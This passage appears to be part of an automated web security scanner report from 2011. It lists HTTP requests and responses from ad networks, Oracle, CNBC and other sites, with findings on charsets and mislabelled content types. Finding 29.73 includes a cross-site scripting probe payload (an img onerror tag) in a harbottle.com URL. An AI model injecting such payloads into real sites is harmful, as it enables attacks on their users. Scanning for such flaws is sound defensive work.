Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1314814617-3398750; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 15:32:14 GMT
Connection: close
Content-Length: 349

<html><body><img src="http://spe.atdmt.com/images/pixel.gif" width="1" height="1" border="0" /><img src="http://ib.adnxs.com/pxj?bidder=55&action=SetAdMarketCookies(%22AA002%3d1314814617-3398750%7cMUI
...[SNIP]...

29.67. http://wd.sharethis.com/api/getCount2.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.tenzing.com%2Fatg-ecommerce-hosting.asp%3Futm_source%3DPG0008-ATG-Solutions%26utm_campaign%3D001%26utm_content%3D01%26utm_term%3D%252BATG%2520%252Bsolutions%26utm_medium%3DPPC HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.tenzing.com/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm_term=%2BATG%20%2Bsolutions&utm_medium=PPC
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CqCKBE5ezzUzVT7FCnHuAg==; __uset=yes

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Tue, 06 Sep 2011 15:32:10 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 250

(function(){stButtons.processCB({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.tenzing.com\/atg-ecommerce-hosting.asp?utm_source=PG0008-ATG-Solutions&utm_campaign=001&utm_content=01&utm
...[SNIP]...

29.68. http://www.bigcommerce.com/freetrial.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/freetrial.php

Request

Response

29.69. http://www.bigcommerce.com/lp/e1-lp-ecommerce.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bigcommerce.com
Path:	/lp/e1-lp-ecommerce.php

Request

Response

29.70. http://www.gillettevenus.com/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/goddess_central/styles/fancybox/jquery.fancybox-1.3.4.js

Request

Response

29.71. http://www.gillettevenus.com/en_US/images/go_roll.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/en_US/images/go_roll.png

Request

Response

29.72. http://www.gillettevenus.com/global/blank.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gillettevenus.com
Path:	/global/blank.html

Request

Response

29.73. http://www.harbottle.com/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/353c3%3E%3Cimg%20src%3da%20onerror%3dprompt(document.location)%3E9d536909165a5febf

Request

Response

29.74. http://www.harbottle.com/hnl/pages/hnl_search2.php/a previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/a

Request

Response

29.75. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/Chambers%202011%20Firm%20Logo.jpg

Request

Response

29.76. http://www.harbottle.com/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.harbottle.com
Path:	/hnl/pages/hnl_search2.php/pix/L500%20Logo.gif

Request

Response

29.77. http://www.rayalab.com/Scripts/AC_RunActiveContent.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/Scripts/AC_RunActiveContent.js

Request

GET /Scripts/AC_RunActiveContent.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:38 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 24p
...[SNIP]...

29.78. http://www.rayalab.com/animate.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/animate.js

Request

GET /animate.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

29.79. http://www.rayalab.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=258269193.1974267751.1315345538.1315345538.1315345538.1; __utmb=258269193.1.10.1315345538; __utmc=258269193; __utmz=258269193.1315345538.1.1.utmgclid=CMuoq_OIiasCFRligwodfwxd4w|utmccn=(not%20set)|utmcmd=(not%20set)|utmctr=Direct%20Beauty%20Product

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 24p
...[SNIP]...

29.80. http://www.rayalab.com/flexcroll.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.rayalab.com
Path:	/flexcroll.js

Request

GET /flexcroll.js HTTP/1.1
Host: www.rayalab.com
Proxy-Connection: keep-alive
Referer: http://www.rayalab.com/?gclid=CMuoq_OIiasCFRligwodfwxd4w
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 16:45:40 GMT
Server: Apache/2.2.17 (Unix) FrontPage/5.0.2.2635
Last-Modified: Thu, 26 Jul 2007 15:14:04 GMT
ETag: "19b842-2b5-4362c13c0adc6"
Accept-Ranges: bytes
Content-Length: 693
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Page Not Found</TITLE>
<style type="text/css">
<!--
h1 {
font-family:Verdana, Arial, Helvetica, sans-serif;
font-size: 24p
...[SNIP]...

29.81. http://www.resourcepoint.net/form.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resourcepoint.net
Path:	/form.htm

Request

Response

29.82. http://www.revsolutionsinc.com/animated_favicon1.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.revsolutionsinc.com
Path:	/animated_favicon1.gif

Request

GET /animated_favicon1.gif HTTP/1.1
Host: www.revsolutionsinc.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:32:55 GMT
Server: LiteSpeed
Connection: Keep-Alive
Keep-Alive: timeout=5, max=100
Cache-Control: private, no-cache, max-age=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 389

<html>
<head><title> 404 Not Found
</title></head>
<body><h1> 404 Not Found
</h1>
The resource requested could not be found on this server!<hr />
Powered By <a href='http://www.litespeedtech.com'>Li
...[SNIP]...

29.83. http://www.sophelle.com/graphic/bullet-sm-w.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/graphic/bullet-sm-w.gif

Request

GET /graphic/bullet-sm-w.gif HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Referer: http://www.sophelle.com/Products/accelerator2.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.21.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A31%3A37

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:38:32 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

29.84. http://www.sophelle.com/images/sophelle-ico.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.sophelle.com
Path:	/images/sophelle-ico.ico

Request

GET /images/sophelle-ico.ico HTTP/1.1
Host: www.sophelle.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hubspotutk=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvm=9c6ca7a5ca1546b9a6b60f57cca70bb6; hsfirstvisit=http%3A%2F%2Fwww.sophelle.com%2F||2011-09-04%2010%3A55%3A54; hubspotvd=9c6ca7a5ca1546b9a6b60f57cca70bb6; hubspotvw=9c6ca7a5ca1546b9a6b60f57cca70bb6; __utma=227204639.668059565.1315148193.1315148193.1315340871.2; __utmb=227204639.4.10.1315340871; __utmc=227204639; __utmz=227204639.1315148193.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); hubspotdt=2011-09-06%2011%3A28%3A05

Response

HTTP/1.1 404 Not Found
Content-Length: 103
Content-Type: text/html
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:26:19 GMT

<html><head><title>Error</title></head><body>The system cannot find the file specified.
</body></html>

30. HTML uses unrecognised charset previous next

Summary

Severity:	Information
Confidence:	Tentative
Host:	https://account.bigcommerce.com
Path:	/mailer/form.php

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

"UTF-8"

Issue background

Applications may specify a non-standard character set as a result of typographical errors within the code base, or because of intentional usage of an unusual character set that is not universally recognised by browsers. If the browser does not recognise the character set specified by the application, then the browser may analyse the HTML and attempt to determine which character set it appears to be using. Even if the majority of the HTML actually employs a standard character set such as UTF-8, the presence of non-standard characters anywhere in the response may cause the browser to interpret the content using a different character set. This can have unexpected results, and can lead to cross-site scripting vulnerabilities in which non-standard encodings like UTF-7 can be used to bypass the application's defensive filters.

In most cases, the absence of a charset directive does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

Request

GET /mailer/form.php HTTP/1.1
Host: account.bigcommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 17:05:41 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset="UTF-8"
Content-Length: 13

Invalid Form.

31. Content type incorrectly stated previous next
There are 105 instances of this issue:

http://4qinvite.4q.iperceptions.com/1.aspx
http://a1.interclick.com/getInPageJS.aspx
http://a1.interclick.com/getInPageJSProcess.aspx
https://account.bigcommerce.com/mailer/form.php
http://ad.doubleclick.net/clk
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322464**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322772**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323080**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323388**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315323696**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324005**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324313**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324623**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315324934**
http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315325243**
http://ads.pointroll.com/PortalServe/
http://api-cdn.cnbc.com/api/chart/chart.asp
http://api.cnbc.com/api/chart/chart.asp
http://api.viglink.com/api/ping
http://apps.cnbc.com/Includes/CheckPng/Script.asp
http://assets1.csc.com/contact_us/media/contact_us4.css
http://assets1.csc.com/services/media/services3.css
http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-getkey.php
http://blog.harbottle.com/dm/wp-content/plugins/wp-hashcash/wp-hashcash-js.php
http://blog.harbottle.com/dm/xmlrpc.php
http://blogs.oracle.com/main/resource/resources/ora_code_blogs.js
http://blogs.oracle.com/otn/resource/1OTN-2col/OTNHead-Short.png
http://blogs.oracle.com/otn/resource/SunOracle.png
http://blogs.oracle.com/otn/resource/java-logo.png
http://blogs.oracle.com/theme/scripts/clientSideInclude.js
http://blogs.oracle.com/theme/scripts/roller.js
http://content.plymedia.com/initialize
http://dynpages-mktas.oracle.com/pls/ebn/swf_viewer.load
http://education.oracle.com/education/css/oracle.css
http://education.oracle.com/pls/web_prod-plq-dad/Webreg_Search_Results.get_countries
https://event.on24.com/eventRegistration/prereg/register.jsp
https://forums.oracle.com/forums/themes/english/resources/feed-icon-14x14.jpg
https://forums.oracle.com/forums/themes/english/resources/info_company.gif
https://forums.oracle.com/forums/themes/english/resources/oralogo_small.gif
https://forums.oracle.com/forums/themes/english/resources/otn_new.css
https://forums.oracle.com/forums/themes/english/resources/s_code.js
https://forums.oracle.com/forums/themes/english/resources/s_code_forums.js
https://forums.oracle.com/forums/themes/english/resources/spacer.gif
https://forums.oracle.com/forums/themes/english/resources/style.css
http://goku.brightcove.com/1pix.gif
http://imp.fetchback.com/serve/fb/adtag.js
http://l.apture.com/v3/
http://m.cnbc.com/mytest/ipecho.php
http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share.jpg/
http://media.cnbc.com/i/CNBC/CNBC_Images/video/cur_video_share_over.jpg/
http://media.cnbc.com/i/CNBC/CNBC_Images/video/vid_control_/
http://media.cnbc.com/i/CNBC/Components/FlashVideo/flashVideoPlayerv81
http://media.cnbc.com/i/CNBC/Components/FlashVideo/inline/flashVideoPlayerv14
http://media.cnbc.com/j/CNBC/Sections/News_And_Analysis/__Story_Inserts/graphics/__PEOPLE/R/ROUBINI_NOURIEL/nouriel
https://myprofile.oracle.com/EndUser/images/fading-background.png
https://myprofile.oracle.com/EndUser/images/logo-oracle-red.png
https://myprofile.oracle.com/EndUser/jscripts/s_code.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_popup.js
https://myprofile.oracle.com/EndUser/jscripts/s_code_profile.js
https://myprofile.oracle.com/EndUser/jscripts/s_validation.js
http://netsuite-www.baynote.net/baynote/tags2/guide/results-products/netsuite-www
http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard
http://now.eloqua.com/visitor/v200/svrGP.aspx
https://oracleus.wingateweb.com/portal/dwr/interface/PortalAjax.js
http://ping.crowdscience.com/ping.js
http://pixel.fetchback.com/serve/fb/pdc
https://register.cnbc.com/RandomImage.jsp
http://rt.disqus.com/forums/realtime-cached.js
http://rt.legolas-media.com/lgrt
http://rww.readwriteweb.netdna-cdn.com/favicon.ico
http://s7.addthis.com/js/addthis_widget.php
http://server.iad.liveperson.net/hcp/html/mTag.js
http://snas.nbcuni.com/snas/api/getRemoteDomainCookies
http://sophelle.app5.hubspot.com/salog.js.aspx
http://subplyevents.cloudapp.net/AddEvent.aspx/061BB857AFEC5D2E9B3ACD2683E66EA8B0CF3633/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
http://subplyevents.cloudapp.net/AddEvent.aspx/0CE9D6956B7A0FCD1E99F1E8A802B1EDB8F1B59A/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
http://subplyevents.cloudapp.net/AddEvent.aspx/1B862009340CE9937F3D91AB6CCA134E42777EEE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
http://subplyevents.cloudapp.net/AddEvent.aspx/DA52446C4D2F6699FE9CD584FA3631B533E893CE/oracle/f979c890-22ec-412f-8e2c-df70d1568052/null
http://tps31.doubleverify.com/visit.js
http://wd.sharethis.com/api/getCount2.php
http://www.atg.com/favicon.ico
http://www.atg.com/svc-common/script/propertyFunc.js.jsp
https://www.atg.com/favicon.ico
https://www.atg.com/svc-common/script/propertyFunc.js.jsp
http://www.cnbc.com/id/24596694/
http://www.facebook.com/extern/login_status.php
http://www.fekkai.com/js/imageLoader.json
http://www.gillettevenus.com/favicon.ico
http://www.google.com/cse/api/008313234753726960933/cse/s6m3qtfkxlu/queries/js
http://www.google.com/search
http://www.harbottle.com/favicon.ico
http://www.marykay.com/images/icn_fb.jpg
http://www.marykay.com/images/icn_yt.jpg
http://www.netsuite.com/portal/javascript/effects.js
http://www.netsuite.com/portal/javascript/prototype.js
http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/392683.jpg
http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/420729.jpg
http://www.oracle.com/ocom/groups/public/@ocompublic/documents/digitalasset/461037.jpg
http://www.oracle.com/pls/ebn/live_viewer.main
http://www.oracle.com/pls/ebn/swf_viewer.load
http://www.oracle.com/pls/ebn/wm_viewer.main
http://www.sophelle.com/graphic/cq_logo-250.gif

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

31.1. http://4qinvite.4q.iperceptions.com/1.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://4qinvite.4q.iperceptions.com
Path:	/1.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /1.aspx?sdfc=718cce93-25878-118cda1e-598a-49c3-aae3-65f5d780afae&lID=1&loc=4Q-WEB2 HTTP/1.1
Host: 4qinvite.4q.iperceptions.com
Proxy-Connection: keep-alive
Referer: http://www.csc.com/search?q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE03
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 16:08:48 GMT
Content-Length: 81

var dm = document.domain;document.cookie='IPE_S_26841=26841;Path=/;domain=' + dm;

31.2. http://a1.interclick.com/getInPageJS.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJS.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJS.aspx?a=53&b=13501&cid=1240946772498 HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf?t=1315339058335&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26layout%3Dblogpost%26pubtime%3D0%26pubfreq%3Dh
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: public
Content-Type: text/html; charset=utf-8
Expires: Tue, 06 Sep 2011 20:57:42 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:41 GMT
Content-Length: 6347

function isSilverlightVersionInstalled(version)
{
if (version == undefined)
version = null;

var isVersionSupported = false;
var container = null;

try
{

...[SNIP]...

31.3. http://a1.interclick.com/getInPageJSProcess.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://a1.interclick.com
Path:	/getInPageJSProcess.aspx

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /getInPageJSProcess.aspx?a=51&b=13501&cid=1240946757066&isif=t&rurld=search.cnbc.com&sl=true&dvp=http%3A//search.cnbc.com/main.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude&rurl=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Ftarget%3Dall%26keywords%3Dxss%26categories%3Dexclude HTTP/1.1
Host: a1.interclick.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Opt=out; T=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Tue, 06 Sep 2011 14:57:09 GMT
Content-Length: 2786

document.write(unescape("%3Cscript%20type%3D%22text/javascript%22%3E%0Afunction%20pr_swfver%28%29%7B%0Avar%20osf%2Cosfd%2Ci%2Caxo%3D1%2Cv%3D0%2Cnv%3Dnavigator%3B%0Aif%28nv.plugins%26%26nv.mimeTypes.le
...[SNIP]...

31.4. https://account.bigcommerce.com/mailer/form.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://account.bigcommerce.com
Path:	/mailer/form.php

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset="UTF-8"

The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /mailer/form.php HTTP/1.1
Host: account.bigcommerce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

31.5. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html

The response states that it contains HTML. However, it actually appears to contain XML.

Request

GET /clk HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Error: Not a valid request
Content-Type: text/html
Content-Length: 45
Date: Tue, 06 Sep 2011 17:05:43 GMT
Server: GFE/2.0
Connection: close

<h1>Error 500 Error: Not a valid request</h1>

31.6. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321534**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.7. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315321844**

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

31.8. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154** previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1655.0.iframe.120x60/1315322154**
